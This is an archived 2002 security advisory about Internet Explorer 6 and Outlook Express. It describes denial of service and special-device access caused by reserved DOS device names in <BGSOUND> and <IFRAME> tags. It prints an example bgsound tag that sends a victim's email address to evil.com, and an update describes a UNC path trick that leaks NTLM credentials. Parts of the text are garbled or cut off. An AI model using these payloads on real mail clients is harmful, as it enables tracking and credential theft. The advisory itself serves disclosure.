TUCoPS :: Browsers :: expl5347.htm

Internet Explorer/Outlook Express Special Device Access/DoS
16th May 2002 [SBWID-5347]

	Special   device   access   and   DoS   in   Internet    Exporer/Outlook


	Internet Explorer 6.0


	In ERRor & 3APA3A advisory :




	All versions of Windows have a reserved filenames  referred  to  special
	devices such as prn, aux, nul, etc also  called  DOS  devices.  Filename
	for special device may have any directory path and any  extension  after
	dot. For example c:\\temp\\prn.tmp refers to prn device. Same API  is  used
	to access special device  and  regular  files.  Unauthorized  access  to
	special device may  be  significant  security  issue  causing  different
	results: from Denial of Service against running program  or  service  to
	hardware failure or secure data compromise.




	ERRor discovered that <BGSOUND> tag in conjunction with special  device
	name causes DoS against Internet Explorer or Outlook Express  regardless
	of security zone  settings.  For  Outlook  Express  it\'s  untrivial  to
	remove malcrafted  message  without losing message folder.

	During investigation of this issue it was  found  by  3APA3A  and  ERRor
	that using <IFRAME> tag it\'s possible to send any  data  to  special

	Another problem is that regardless  of  security  zone  settings  source
	specified  in  <BGSOUND>  tag  is  always  downloaded.  It  makes  it
	possible to fingerprint remote client by his e-mail using  something  like

	<bgsound src=3D\"http://evil.com/registerme?email=3Dvictim@com.com\">


	Remote client fingerprint problem is discussed in [4].





	You can use [2] to test DoS against Outlook Express  via  <BGSOUND>.=20
	[3] will print text line on a text printer,  attached  to  LPT1,  (in  =
	Outlook Express 6.0) via <IFRAME>

	1. Special device access and DoS in Outlook Express


	2. Outlook Express Special Device DoS POC


	3. Outlook Express Special Device access POC


	4. Security risks assoticated with using e-mail.





	 Update (21 May 2002)



	Chad          Loder           added           that           <bgsound
	src=3D\"\\\\\\new\\file.wav\">  causes  IE   to   connect
	to   via   NetBT.   Depending   on   LMCompatibilityLevel
	it may cause user\'s cleartext password or NTLMv1 challenge to leak.  It\'s
	very serious bug.


	None to our knowledge, however if a patch is  posted  it  will  probalby
	find it\'s way there :



TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH